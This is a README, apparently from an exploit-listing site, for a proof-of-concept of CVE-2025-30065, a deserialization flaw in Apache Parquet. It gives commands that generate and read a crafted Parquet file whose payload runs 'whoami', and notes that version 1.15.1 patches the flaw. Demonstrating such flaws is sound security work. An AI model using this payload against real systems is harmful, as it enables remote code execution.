## https://sploitus.com/exploit?id=96E935DC-3088-5219-AD0F-8CDE2854825C
# ๐ฅ CVE-2025-30065 - Parquet Deserialization PoC
This project demonstrates a safe proof-of-concept for CVE-2025-30065 using Apache Parquet and Java deserialization.
When a Parquet file containing a serialized Java object is read, the payload executes a visible command to prove code execution.
---
## ๐ฆ Usage
### Generate the Parquet payload:
```bash
docker-compose run --rm maven-parquet mvn compile exec:java -Dexec.mainClass=ParquetPayloadWriter
docker-compose run --rm maven-parquet mvn compile exec:java -Dexec.mainClass=ParquetPayloadReader
```
You should see something like:
[๐ payload output] {output of whoami}
### Won't work in patched 1.15.1
Try to change the version number to 1.15.1 from the vulnerable <1.15.0 in /app/pom.xml. It will no longer work.
### links
[BleepingComputer](https://www.bleepingcomputer.com/news/security/max-severity-rce-flaw-discovered-in-widely-used-apache-parquet/)
[NIST CVE](https://nvd.nist.gov/vuln/detail/CVE-2025-30065)